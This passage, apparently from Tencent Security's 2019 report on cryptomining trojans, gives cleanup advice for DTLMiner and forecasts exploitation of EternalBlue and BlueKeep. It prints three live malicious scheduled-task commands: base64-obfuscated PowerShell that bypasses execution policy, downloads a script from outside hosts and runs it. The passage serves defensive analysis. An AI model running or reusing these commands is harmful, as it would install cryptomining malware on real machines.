WannaMiner清理建议
3)DTLMiner(永恒之蓝下载器木马)
DTLMiner清理建议
删除随机名计划任务:“VDoaC”、"hadpeRz\oABwX"、"lKNVFjCJm\oWuUXql"
DTLMiner随机名计划任务
启动程序分别为:
/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBWAEQAbwBhAEMAJwA7ACQAeQA9ACcAaAB0AHQAcAA6AC8ALwB0AC4AdAByADIAcQAuAGMAbwBtAC4AYwBvAG0ALwB2AC4AagBzACcAOwAkAHoAPQAkAHkAKwAnAHAAJwArACcAPwBtAHMAXwAyADAAMQA5ADEAMgAyADcAJwA7ACQAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHkAKQA7AFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AF0AOgA6AEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoACQAbQApAHwAZgBvAHIAZQBhAGMAaAB7ACQAcwArAD0AJABfAC4AVABvAFMAdAByAGkAbgBnACgAJwB4ADIAJwApAH0AOwBpAGYAKAAkAHMALQBlAHEAJwBkADgAMQAwADkAYwBlAGMAMABhADUAMQA3ADEAOQBiAGUANgBmADQAMQAxAGYANgA3AGIAMwBiADcAZQBjADEAJwApAHsASQBFAFgAKAAtAGoAbwBpAG4AWwBjAGgAYQByAFsAXQBdACQAbQApAH0A"
/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBoAGEAZABwAGUAUgB6AFwAbwBBAEIAdwBYACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAGEAdwBjAG4AYQAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AbQBzAF8AMgAwADEAOQAxADIAMgA3ACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBNAEQANQBdADoAOgBDAHIAZQBhAHQAZQAoACkALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAG0AKQB8AGYAbwByAGUAYQBjAGgAewAkAHMAKwA9ACQAXwAuAFQAbwBTAHQAcgBpAG4AZwAoACcAeAAyACcAKQB9ADsAaQBmACgAJABzAC0AZQBxACcAZAA4ADEAMAA5AGMAZQBjADAAYQA1ADEANwAxADkAYgBlADYAZgA0ADEAMQBmADYANwBiADMAYgA3AGUAYwAxACcAKQB7AEkARQBYACgALQBqAG8AaQBuAFsAYwBoAGEAcgBbAF0AXQAkAG0AKQB9AA=="
/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEsATgBWAEYAagBDAEoAbQBcAG8AVwB1AFUAWABxAGwAJwA7ACQAeQA9ACcAaAB0AHQAcAA6AC8ALwB0AC4AYQBtAHgAbgB5AC4AYwBvAG0ALwB2AC4AagBzACcAOwAkAHoAPQAkAHkAKwAnAHAAJwArACcAPwBtAHMAXwAyADAAMQA5ADEAMgAyADcAJwA7ACQAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHkAKQA7AFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AF0AOgA6AEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoACQAbQApAHwAZgBvAHIAZQBhAGMAaAB7ACQAcwArAD0AJABfAC4AVABvAFMAdAByAGkAbgBnACgAJwB4ADIAJwApAH0AOwBpAGYAKAAkAHMALQBlAHEAJwBkADgAMQAwADkAYwBlAGMAMABhADUAMQA3ADEAOQBiAGUANgBmADQAMQAxAGYANgA3AGIAMwBiADcAZQBjADEAJwApAHsASQBFAFgAKAAtAGoAbwBpAG4AWwBjAGgAYQByAFsAXQBdACQAbQApAH0A"
六、挖矿木马的未来趋势
6.1 “永恒之蓝“漏洞
自2017年NSA武器泄漏以来,“永恒之蓝“漏洞被挖矿木马广泛利用。随着各大安全厂商对该漏洞进行修复和防御,该漏洞的影响正在逐渐减少。但是从数据上看,仍有约30%未安装“永恒之蓝“漏洞补丁,因此预计2020年有可能出现新的利用“永恒之蓝“漏洞的挖矿木马。
6.2BlueKeep漏洞
2019年5月15日,微软发布了针对远程桌面服务(Remote Desktop Services ,以前称为终端服务)的关键远程执行代码漏洞CVE-2019-0708的修复程序,该漏洞影响Windows的Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP等多个版本。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码。
2019年9月,我们注意到利用CVE-2019-0708漏洞的EXP代码已被公开发布至metasploit-framework的Pull requests中,经测试可以实现远程代码执行;同时在2019年10月挖矿蠕虫DTLMiner在其攻击模块中也已经加入了CVE-2019-0708漏洞检测代码,因此我们推测在2020年极有可能出现利用该漏洞的新型挖矿木马。
6.3僵尸网络
MyKings、KingMiner、WannaMiner等挖矿僵尸网络在前期感染了大量机器,控制系统后通过计划任务、数据库存储过程、WMI等技术进行持久化攻击,因而可随时从服务器下载最新版本的恶意代码,很难被彻底清除。未来安全厂商与这些病毒团伙在的对抗还会持续。
此文由 比特币官网 编辑,未经允许不得转载!:首页 > 比特币挖矿 » 腾讯安全发布2019年度挖矿木马报告(全文)